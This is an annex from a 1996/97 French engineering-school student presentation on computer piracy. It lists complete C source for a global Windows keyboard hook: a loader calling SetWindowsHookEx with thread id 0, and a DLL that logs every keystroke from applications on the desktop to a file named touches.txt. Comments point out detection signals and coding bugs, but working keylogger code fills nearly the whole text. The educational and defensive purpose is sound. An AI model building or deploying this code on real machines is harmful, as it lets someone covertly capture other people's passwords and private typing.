Exposés des élèves du cours de deuxième année de l'Ecole des Mines de Nancy RESEAUX 1996/1997
Le piratage informatique, par Steve JENESTE, Gilles LACROIX et François SCHMITT


Annexe: interception des évènements-clavier

 

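Le programme suivant charge une DLL (bibliothèque de liens dynamiques) et demande à Windows d'appeler une fonction de cette DLL lorsqu'une touche du clavier a été enfoncée. Le dernier argument passé à SetWindowsHookEx étant 0, le crochet (hook) est global : il ne se limite pas au programme lui-même mais concerne les applications du même bureau. Du point de vue de la détection, c'est l'appel à surveiller.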

 

#include <windows.h>

/*
 * Loader for the keyboard hook.
 *
 * Loads kbdmsg.dll, looks up its exported KeyboardProc and registers it
 * with SetWindowsHookEx as a WH_KEYBOARD hook, then spins forever.
 * None of the four WinMain parameters is used.
 *
 * Points a defender can take from this listing:
 *  - The thread id passed to SetWindowsHookEx is 0. Per the Win32
 *    documentation this makes the hook global (all threads on the calling
 *    thread's desktop), so the DLL ends up mapped into other processes.
 *    An unfamiliar module loaded in many unrelated processes, and a
 *    SetWindowsHookEx(WH_KEYBOARD, ..., 0) call from an unknown binary,
 *    are the observable signals.
 *  - The DLL is named by a bare file name, so it is resolved through the
 *    normal DLL search order rather than from a fixed path.
 *  - No UnhookWindowsHookEx call appears in this listing.
 *
 * NOTE(review): the results of LoadLibrary, GetProcAddress and
 * SetWindowsHookEx are used without being checked.
 */
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR pszCmdLine,
int nCmdShow)
{
HOOKPROC hkprcSysMsg;
static HINSTANCE hinstDLL;
/* Hook handle kept only here; it is never handed to the DLL, whose own
   hhookSysMsg global is a separate variable. */
static HHOOK hhookSysMsg;

/* load the DLL */
/* NOTE(review): the cast silences the compiler if LPCTSTR is a wide-string
   type (UNICODE build) while the literal stays narrow -- confirm build mode. */
hinstDLL = LoadLibrary((LPCTSTR) "kbdmsg.dll");

/* fetch the address of the DLL's KeyboardProc function */
hkprcSysMsg = (HOOKPROC)GetProcAddress(hinstDLL, "KeyboardProc");

/* attach the function to keyboard events (thread id 0 = global hook) */
hhookSysMsg = SetWindowsHookEx(WH_KEYBOARD,hkprcSysMsg, hinstDLL, 0);

/* infinite loop, so that the DLL stays active */
/* This is a busy-wait with no message loop: the process never yields, so
   sustained CPU use by a windowless process is another visible artefact. */

while (1)
;

/* never reached: the loop above has no exit */
return 0;
}

La DLL chargée par le programme précédent peut avoir la forme suivante :


#include <windows.h>
#include <stdio.h>

/* Hook handle forwarded to CallNextHookEx. Nothing in this listing assigns
   it, so it keeps its zero initial value. */
HHOOK hhookSysMsg;

/*
 * WH_KEYBOARD hook procedure exported by the DLL.
 *
 * For every keyboard message with nCode >= 0 it appends one line to
 * "touches.txt" holding a running counter, the numeric virtual-key code
 * taken from wParam and a textual label, then passes the event on with
 * CallNextHookEx.
 *
 * nCode  : hook code; negative values are forwarded without logging.
 * wParam : virtual-key code of the key.
 * lParam : passed through to CallNextHookEx untouched; not examined here.
 * Returns whatever CallNextHookEx returns.
 *
 * Points a defender can take from this listing:
 *  - The log file is named by a relative path, so it is created in the
 *    current directory of whichever process the hook runs in; a file named
 *    touches.txt receiving small appends is the on-disk artefact.
 *  - The file is opened and closed on each logged event, which shows up as
 *    a burst of open/append/close operations correlated with typing.
 *  - Only virtual-key codes are recorded, not translated characters.
 *
 * NOTE(review): fopen runs before the nCode test, and the early return
 * below does not call fclose, so that path leaks the stream. The result
 * of fopen is also used without a NULL check.
 * NOTE(review): wParam is printed with %d although WPARAM is not an int;
 * the two differ in size on 64-bit builds -- confirm target platform.
 */
LRESULT CALLBACK KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam)
{

FILE *fp;
/* event counter; static, so it persists between calls */
static int c = 0;

/* file used to store the keystrokes (append mode, relative path) */
fp=fopen("touches.txt","a+");


if (nCode < 0) /* do not process the message */
return CallNextHookEx(hhookSysMsg, nCode, wParam, lParam);

/* wParam holds the virtual-key code of the key */
switch(wParam)
{
/* named control, navigation and function keys */
case(VK_RETURN):
fprintf(fp, "%d:\tvk: %d [Return] \n", c++,wParam);
break;
case(VK_BACK):
fprintf(fp, "%d:\tvk: %d [Back] \n", c++,wParam);
break;
case(VK_TAB):
fprintf(fp, "%d:\tvk: %d [Tab] \n", c++,wParam);
break;
case(VK_SHIFT):
fprintf(fp, "%d:\tvk: %d [Shift] \n", c++,wParam);
break;
case(VK_MENU):
fprintf(fp, "%d:\tvk: %d [Alt] \n", c++,wParam);
break;
case(VK_CONTROL):
fprintf(fp, "%d:\tvk: %d [Ctrl] \n", c++,wParam);
break;
case(VK_SPACE):
fprintf(fp, "%d:\tvk: %d [Space] \n", c++,wParam);
break;
case(VK_CAPITAL):
fprintf(fp, "%d:\tvk: %d [CapsLock] \n", c++,wParam);
break;
case(VK_ESCAPE):
fprintf(fp, "%d:\tvk: %d [Escape] \n", c++,wParam);
break;
case(VK_PRIOR):
fprintf(fp, "%d:\tvk: %d [PgUp] \n", c++,wParam);
break;
case(VK_NEXT):
fprintf(fp, "%d:\tvk: %d [PgDn] \n", c++,wParam);
break;
case(VK_UP):
fprintf(fp, "%d:\tvk: %d [Up] \n", c++,wParam);
break;
case(VK_DOWN):
fprintf(fp, "%d:\tvk: %d [Down] \n", c++,wParam);
break;
case(VK_LEFT):
fprintf(fp, "%d:\tvk: %d [Left] \n", c++,wParam);
break;
case(VK_RIGHT):
fprintf(fp, "%d:\tvk: %d [Right] \n", c++,wParam);
break;
case(VK_INSERT):
fprintf(fp, "%d:\tvk: %d [Inser] \n", c++,wParam);
break;
case(VK_HOME):
fprintf(fp, "%d:\tvk: %d [Home] \n", c++,wParam);
break;
case(VK_DELETE):
fprintf(fp, "%d:\tvk: %d [Suppr] \n", c++,wParam);
break;
case(VK_END):
fprintf(fp, "%d:\tvk: %d [Fin] \n", c++,wParam);
break;
case(VK_NUMLOCK):
fprintf(fp, "%d:\tvk: %d [VerrNum] \n", c++,wParam);
break;
case(VK_F1):
fprintf(fp, "%d:\tvk: %d [F1] \n", c++,wParam);
break;
case(VK_F2):
fprintf(fp, "%d:\tvk: %d [F2] \n", c++,wParam);
break;
case(VK_F3):
fprintf(fp, "%d:\tvk: %d [F3] \n", c++,wParam);
break;
case(VK_F4):
fprintf(fp, "%d:\tvk: %d [F4] \n", c++,wParam);
break;
case(VK_F5):
fprintf(fp, "%d:\tvk: %d [F5] \n", c++,wParam);
break;
case(VK_F6):
fprintf(fp, "%d:\tvk: %d [F6] \n", c++,wParam);
break;
case(VK_F7):
fprintf(fp, "%d:\tvk: %d [F7] \n", c++,wParam);
break;
case(VK_F8):
fprintf(fp, "%d:\tvk: %d [F8] \n", c++,wParam);
break;
case(VK_F9):
fprintf(fp, "%d:\tvk: %d [F9] \n", c++,wParam);
break;
case(VK_F10):
fprintf(fp, "%d:\tvk: %d [F10] \n", c++,wParam);
break;
case(VK_F11):
fprintf(fp, "%d:\tvk: %d [F11] \n", c++,wParam);
break;
case(VK_F12):
fprintf(fp, "%d:\tvk: %d [F12] \n", c++,wParam);
break;

/* letter and digit keys, matched by their character constants */
case('A'):
fprintf(fp, "%d:\tvk: %d [A] \n", c++,wParam);
break;
case('B'):
fprintf(fp, "%d:\tvk: %d [B] \n", c++,wParam);
break;
case('C'):
fprintf(fp, "%d:\tvk: %d [C] \n", c++,wParam);
break;
case('D'):
fprintf(fp, "%d:\tvk: %d [D] \n", c++,wParam);
break;
case('E'):
fprintf(fp, "%d:\tvk: %d [E] \n", c++,wParam);
break;
case('F'):
fprintf(fp, "%d:\tvk: %d [F] \n", c++,wParam);
break;
case('G'):
fprintf(fp, "%d:\tvk: %d [G] \n", c++,wParam);
break;
case('H'):
fprintf(fp, "%d:\tvk: %d [H] \n", c++,wParam);
break;
case('I'):
fprintf(fp, "%d:\tvk: %d [I] \n", c++,wParam);
break;
case('J'):
fprintf(fp, "%d:\tvk: %d [J] \n", c++,wParam);
break;
case('K'):
fprintf(fp, "%d:\tvk: %d [K] \n", c++,wParam);
break;
case('L'):
fprintf(fp, "%d:\tvk: %d [L] \n", c++,wParam);
break;
case('M'):
fprintf(fp, "%d:\tvk: %d [M] \n", c++,wParam);
break;
case('N'):
fprintf(fp, "%d:\tvk: %d [N] \n", c++,wParam);
break;
case('O'):
fprintf(fp, "%d:\tvk: %d [O] \n", c++,wParam);
break;
case('P'):
fprintf(fp, "%d:\tvk: %d [P] \n", c++,wParam);
break;
case('Q'):
fprintf(fp, "%d:\tvk: %d [Q] \n", c++,wParam);
break;
case('R'):
fprintf(fp, "%d:\tvk: %d [R] \n", c++,wParam);
break;
case('S'):
fprintf(fp, "%d:\tvk: %d [S] \n", c++,wParam);
break;
case('T'):
fprintf(fp, "%d:\tvk: %d [T] \n", c++,wParam);
break;
case('U'):
fprintf(fp, "%d:\tvk: %d [U] \n", c++,wParam);
break;
case('V'):
fprintf(fp, "%d:\tvk: %d [V] \n", c++,wParam);
break;
case('W'):
fprintf(fp, "%d:\tvk: %d [W] \n", c++,wParam);
break;
case('X'):
fprintf(fp, "%d:\tvk: %d [X] \n", c++,wParam);
break;
case('Y'):
fprintf(fp, "%d:\tvk: %d [Y] \n", c++,wParam);
break;
case('Z'):
fprintf(fp, "%d:\tvk: %d [Z] \n", c++,wParam);
break;
case('0'):
fprintf(fp, "%d:\tvk: %d [0] \n", c++,wParam);
break;
case('1'):
fprintf(fp, "%d:\tvk: %d [1] \n", c++,wParam);
break;
case('2'):
fprintf(fp, "%d:\tvk: %d [2] \n", c++,wParam);
break;
case('3'):
fprintf(fp, "%d:\tvk: %d [3] \n", c++,wParam);
break;
case('4'):
fprintf(fp, "%d:\tvk: %d [4] \n", c++,wParam);
break;
case('5'):
fprintf(fp, "%d:\tvk: %d [5] \n", c++,wParam);
break;
case('6'):
fprintf(fp, "%d:\tvk: %d [6] \n", c++,wParam);
break;
case('7'):
fprintf(fp, "%d:\tvk: %d [7] \n", c++,wParam);
break;
case('8'):
fprintf(fp, "%d:\tvk: %d [8] \n", c++,wParam);
break;
case('9'):
fprintf(fp, "%d:\tvk: %d [9] \n", c++,wParam);
break;
/* numeric keypad */
case(VK_NUMPAD0):
fprintf(fp, "%d:\tvk: %d [Num0] \n", c++,wParam);
break;
case(VK_NUMPAD1):
fprintf(fp, "%d:\tvk: %d [Num1] \n", c++,wParam);
break;
case(VK_NUMPAD2):
fprintf(fp, "%d:\tvk: %d [Num2] \n", c++,wParam);
break;
case(VK_NUMPAD3):
fprintf(fp, "%d:\tvk: %d [Num3] \n", c++,wParam);
break;
case(VK_NUMPAD4):
fprintf(fp, "%d:\tvk: %d [Num4] \n", c++,wParam);
break;
case(VK_NUMPAD5):
fprintf(fp, "%d:\tvk: %d [Num5] \n", c++,wParam);
break;
case(VK_NUMPAD6):
fprintf(fp, "%d:\tvk: %d [Num6] \n", c++,wParam);
break;
case(VK_NUMPAD7):
fprintf(fp, "%d:\tvk: %d [Num7] \n", c++,wParam);
break;
case(VK_NUMPAD8):
fprintf(fp, "%d:\tvk: %d [Num8] \n", c++,wParam);
break;
case(VK_NUMPAD9):
fprintf(fp, "%d:\tvk: %d [Num9] \n", c++,wParam);
break;
case(VK_ADD):
fprintf(fp, "%d:\tvk: %d [Num+] \n", c++,wParam);
break;
case(VK_SUBTRACT):
fprintf(fp, "%d:\tvk: %d [Num-] \n", c++,wParam);
break;
case(VK_MULTIPLY):
fprintf(fp, "%d:\tvk: %d [Num*] \n", c++,wParam);
break;
case(VK_DIVIDE):
fprintf(fp, "%d:\tvk: %d [Num/] \n", c++,wParam);
break;
case(VK_DECIMAL):
fprintf(fp, "%d:\tvk: %d [Num.] \n", c++,wParam);
break;
/* Punctuation keys given as raw virtual-key numbers. The labels presumably
   reflect a French AZERTY keyboard; the mapping is layout-dependent --
   confirm before relying on it when reading a recovered log. */
case(188):
fprintf(fp, "%d:\tvk: %d [,] \n", c++,wParam);
break;
case(190):
fprintf(fp, "%d:\tvk: %d [;] \n", c++,wParam);
break;
case(191):
fprintf(fp, "%d:\tvk: %d [:] \n", c++,wParam);
break;
case(223):
fprintf(fp, "%d:\tvk: %d [!] \n", c++,wParam);
break;
case(226):
fprintf(fp, "%d:\tvk: %d [<] \n", c++,wParam);
break;
case(192):
fprintf(fp, "%d:\tvk: %d [ù] \n", c++,wParam);
break;
case(220):
fprintf(fp, "%d:\tvk: %d [*] \n", c++,wParam);
break;
case(186):
fprintf(fp, "%d:\tvk: %d [$] \n", c++,wParam);
break;
case(221):
fprintf(fp, "%d:\tvk: %d [^] \n", c++,wParam);
break;
case(219):
fprintf(fp, "%d:\tvk: %d [)] \n", c++,wParam);
break;
case(187):
fprintf(fp, "%d:\tvk: %d [=] \n", c++,wParam);
break;
/* any other code is still recorded, with a placeholder label */
default:
fprintf(fp, "%d:\tvk: %d [???] \n", c++,wParam);
}

fclose(fp);

/* hand the event to the next hook in the chain so typing is not blocked */
return CallNextHookEx(hhookSysMsg, nCode, wParam,lParam);
}